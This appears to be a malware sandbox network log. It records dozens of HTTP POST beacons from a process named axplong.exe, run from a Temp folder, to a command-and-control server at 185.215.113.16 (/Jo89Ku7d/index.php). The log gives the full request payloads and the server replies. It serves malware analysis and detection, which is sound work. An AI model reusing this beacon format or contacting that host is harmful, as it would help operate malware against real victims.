Aug 19, 2024 06:05:39.305632114 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:40.047751904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49824	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:40.287497997 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49825	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:40.346482038 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:41.321682930 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49826	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:41.473840952 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:42.226744890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49827	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:42.239003897 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:42.998763084 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49828	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:43.122188091 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:43.868618965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49829	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:43.892182112 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:44.638798952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49830	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:44.755187035 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:45.495402098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49831	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:45.504431009 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:46.279033899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49832	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:46.412867069 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:47.179949045 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49833	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:47.226733923 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:47.978416920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49834	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:48.098694086 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:48.876153946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49835	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:48.916273117 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:49.666708946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49836	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:49.781270981 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:50.529617071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49837	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:50.698224068 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:51.480015993 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49838	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:51.597208023 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:52.355118990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49840	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:52.373312950 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:53.126596928 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49841	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:53.556243896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:54.314229965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49843	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:54.323467016 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:55.079286098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49845	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:55.203588009 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49846	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:55.221463919 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:55.985274076 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49847	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:56.551386118 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:57.301047087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49849	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:57.310451984 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:58.098809958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49851	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:58.219192028 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
